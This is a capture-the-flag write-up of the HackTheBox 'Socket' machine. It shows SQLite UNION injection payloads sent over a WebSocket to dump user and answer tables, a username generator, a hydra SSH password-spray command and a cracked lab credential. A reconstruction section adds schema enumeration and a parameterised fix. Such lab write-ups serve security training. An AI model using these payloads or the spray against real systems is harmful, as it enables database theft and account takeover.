
Playing Hacks and Stuffs!


Project maintained by h4ckyou Hosted on GitHub Pages — Theme by mattgraham

Socket HackTheBox

Difficulty = Medium

IP Address = 10.129.192.218

Nmap scan [image]

I added the domain to my /etc/hosts file (the desktop client later connects to ws.qreader.htb as well, so that name needs an entry too).

After checking the web server [image]

The only functionality there is converting a string to a QR code, or decoding a QR code and showing its contents.

There is also a file offered for download [image]

The download turned out to be a zip file, so I extracted it [image]

The extracted qreader file looks like a compiled Python binary packed with PyInstaller.

We can decompile it with uncompyle6, but first we need to pull the main script out of the PyInstaller archive as a .pyc file. pyi-archive_viewer is interactive: at the ? prompt, X extracts the named entry and asks for an output filename.

pyi-archive_viewer qreader
? X qreader
to filename? ./qreader.pyc

Then decompile using uncompyle6

uncompyle6 qreader.pyc > qreader.py

I ran into issues with this because uncompyle6 works with Python 3.8, and ever since I updated my Linux it has been misbehaving.

So I used a VPS (the THM attack box) for this [image]

Here's the vulnerable part of the decompiled code:

...
ws_host = 'ws://ws.qreader.htb:5789'
...
    def version(self):
        # Sends {"version": VERSION} as JSON to the /version endpoint over the WebSocket
        response = asyncio.run(ws_connect(ws_host + '/version', json.dumps({
            'version': VERSION })))
        data = json.loads(response)
        if 'error' not in data.keys():
            version_info = data['message']
            msg = f'''[INFO] You have version {version_info['version']} which was released on {version_info['released_date']}'''
            self.statusBar().showMessage(msg)
            return None
        # uncompyle6 emitted `None['error']` here, a decompiler artifact; the original reads data['error']
        error = data['error']
        self.statusBar().showMessage(error)
...

It connects to the WebSocket server on port 5789 and sends the value of VERSION as JSON to the /version endpoint. That value is client-controlled, which is what makes it worth testing.

After asking ChatGPT for a script to connect to the WebSocket, it produced this:

from websocket import create_connection  # from the websocket-client package
import json

ws_host = 'ws://ws.qreader.htb:5789'

VERSION = '0.0.2'

# Open the socket, send the same JSON the desktop client sends, print the raw reply
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()

Running it works:

➜  Socket python3.10 connect.py
{"message": {"id": 2, "version": "0.0.2", "released_date": "26/09/2022", "downloads": 720}}
➜  Socket 

From here the best thing to try, I guess, is SQL injection: the server looks the version up in a database and echoes the matching row (id, version, released_date, downloads), so a UNION with four columns should reflect whatever we select.

I followed Resource and found that it is SQLite injection.

From there I dumped the users table and the answers table.

Here’s the script

from websocket import create_connection  # from the websocket-client package
import json

ws_host = 'ws://ws.qreader.htb:5789'

# The server wraps the version in double quotes, so `"` closes the string.
# 0.0.3 does not exist, so only the UNION rows come back; 3,4 pad the
# SELECT to the four columns (id, version, released_date, downloads) the
# original query returns. `-- -` comments out the trailing quote.
VERSION = '0.0.3" UNION SELECT username,password,3,4 from users-- -'

ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()


# Same trick against the answers table; group_concat() collapses every row
# into one string so a single returned row carries the whole table.
VERSION = '0.0.3" UNION SELECT group_concat(answered_by),group_concat(answer),3,4 from answers-- -'

ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()

Running that gives a password hash and a user [image]
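To make the mechanism reproducible offline, here is an added example (not code from the box or from the original post) that rebuilds the vulnerable lookup against an in-memory SQLite database. The schema, the row contents and the exact shape of the backend query are constructed assumptions: the real server's tables are only known through the column names the injection used (users.username, users.password, answers.answered_by, answers.answer) and the four fields the /version reply returns. The real payload breaks out with a double quote because SQLite accepts a double-quoted token as a string literal when it does not resolve to an identifier; the reconstruction below uses single quotes so it also runs on SQLite builds compiled with SQLITE_DQS=0. The same helper also shows the step the writeup skips, enumerating table names from sqlite_master before dumping them, and a parameterised lookup that rejects the payload.

```python
import re
import sqlite3

# Constructed stand-in for the qreader backend (assumption, not the real database).
# `versions` mirrors the four fields the /version endpoint echoes back.
SCHEMA = """
CREATE TABLE versions (id INTEGER PRIMARY KEY, version TEXT, released_date TEXT, downloads INTEGER);
CREATE TABLE users    (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE answers  (id INTEGER PRIMARY KEY, answered_by TEXT, answer TEXT);
INSERT INTO versions VALUES (1, '0.0.1', '01/01/2022', 100), (2, '0.0.2', '26/09/2022', 720);
INSERT INTO users    VALUES (1, 'alice', 'constructed-hash-placeholder');
INSERT INTO answers  VALUES (1, 'Thomas Keller', 'constructed answer text');
"""


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_vulnerable(con, version):
    """Assumed backend behaviour: the client-supplied version is interpolated into SQL."""
    query = ("SELECT id, version, released_date, downloads FROM versions "
             f"WHERE version = '{version}'")
    return con.execute(query).fetchall()


def lookup_safe(con, version):
    """Hardened form: allow-list the format, then bind the value as a parameter."""
    if not re.fullmatch(r"\d+\.\d+\.\d+", version):
        return []
    return con.execute(
        "SELECT id, version, released_date, downloads FROM versions WHERE version = ?",
        (version,),
    ).fetchall()


def union_payload(columns, table):
    """Build the same UNION payload the writeup uses, generalised to any column list:
    a version that does not exist, then pad with literals up to four columns."""
    cols = list(columns) + [str(i) for i in range(len(columns) + 1, 5)]
    return f"0.0.3' UNION SELECT {','.join(cols)} FROM {table}-- -"


def dump(con):
    """Full extraction: enumerate the schema first, then pull the interesting tables."""
    tables = lookup_vulnerable(con, union_payload(["name", "sql"], "sqlite_master"))
    users = lookup_vulnerable(con, union_payload(["username", "password"], "users"))
    answers = lookup_vulnerable(
        con, union_payload(["group_concat(answered_by)", "group_concat(answer)"], "answers"))
    return {"tables": tables, "users": users, "answers": answers}


if __name__ == "__main__":
    db = open_db()
    for name, rows in dump(db).items():
        print(name, rows)
    print("safe:", lookup_safe(db, union_payload(["username", "password"], "users")))
```

Each injected row lands in the id/version/released_date/downloads slots of the reply, which is why the username shows up where the server normally prints an id. The hardened lookup returns nothing for the payload while still answering a well-formed version such as 0.0.2.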

Using CrackStation I got the plaintext for the hash [image]

Now that we have the password, how about the user?

Notice the name Thomas Keller in the output; we can derive likely usernames from it.

Using a script, I generated possible usernames [image]
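The writeup does not show its generator, so here is an added example (my own, not the author's script) that produces the common username formats for a "First Last" name; the set of separators and patterns is a personal choice, not anything the box dictates.

```python
import unicodedata


def _clean(token):
    """Lower-case and strip accents/punctuation so 'Müller-Lüdenscheidt' still yields usable tokens."""
    token = unicodedata.normalize("NFKD", token).encode("ascii", "ignore").decode()
    return "".join(ch for ch in token.lower() if ch.isalnum())


def username_candidates(full_name, seps=("", ".", "_", "-")):
    """Return a sorted, de-duplicated list of likely usernames for a full name.

    Patterns: first+last, last+first, initial+last, last+initial, first+initial,
    initial+first, plus the bare first name, bare last name and the two initials.
    """
    parts = [p for p in (_clean(t) for t in full_name.split()) if p]
    if not parts:
        return []
    if len(parts) == 1:
        return parts
    first, last = parts[0], parts[-1]
    fi, li = first[0], last[0]
    out = {first, last, fi + li, li + fi}
    for sep in seps:
        out.update({
            f"{first}{sep}{last}", f"{last}{sep}{first}",
            f"{fi}{sep}{last}",    f"{last}{sep}{fi}",
            f"{first}{sep}{li}",   f"{li}{sep}{first}",
        })
    return sorted(out)


def write_wordlist(full_name, path):
    """Write one candidate per line, ready for hydra -L."""
    names = username_candidates(full_name)
    with open(path, "w") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    print("\n".join(username_candidates("Thomas Keller")))
```

Write the list to a file and pair it with the cracked password, for example `hydra -L users.txt -p '<password>' ssh://10.129.192.218`, which is the password-spray shape the next step uses.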

I then used hydra to spray the cracked password against those usernames over SSH [image]

Now that we have valid credentials, tkeller:denjanjade122566, let's log in over SSH [image]

Let's get root.

Checking sudo -l shows that the user can run /usr/local/sbin/build-installer.sh as root [image]

Here's the content of /usr/local/sbin/build-installer.sh [image]